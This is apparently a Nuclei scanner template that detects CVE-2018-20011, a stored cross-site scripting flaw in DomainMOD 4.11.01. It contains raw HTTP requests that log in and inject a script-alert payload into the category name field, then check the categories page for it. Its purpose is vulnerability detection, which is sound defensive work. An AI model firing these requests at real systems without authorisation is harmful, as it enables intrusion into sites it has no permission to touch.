id: CVE-2018-20011 info: name: DomainMOD 4.11.01 - Cross-Site Scripting author: arafatansari severity: medium description: | DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/category.php CatagoryName and StakeHolder parameters. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/46374/ - https://github.com/domainmod/domainmod/issues/88 - https://nvd.nist.gov/vuln/detail/CVE-2018-20011 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2018-20011 cwe-id: CWE-79 epss-score: 0.00153 epss-percentile: 0.51511 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: domainmod product: domainmod tags: cve2018,cve,domainmod,xss,authenticated,edb http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded new_username={{username}}&new_password={{password}} - | POST /assets/add/category.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded new_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes= - | GET /assets/categories.php HTTP/1.1 Host: {{Hostname}} host-redirects: true max-redirects: 2 matchers: - type: dsl dsl: - 'status_code_3 == 200' - 'contains(header_3, "text/html")' - 'contains(body_3, ">")' condition: and # digest: 4b0a00483046022100f7f2f52584061ece5ec5571c80f708f8ff5e64361058c0b8a129d98ff827cef1022100ecae8cc495451e84e1250d3e690b271607661c4b1f63dbff75985005b11a25ac:922c64590222798bb761d5b6d8e72950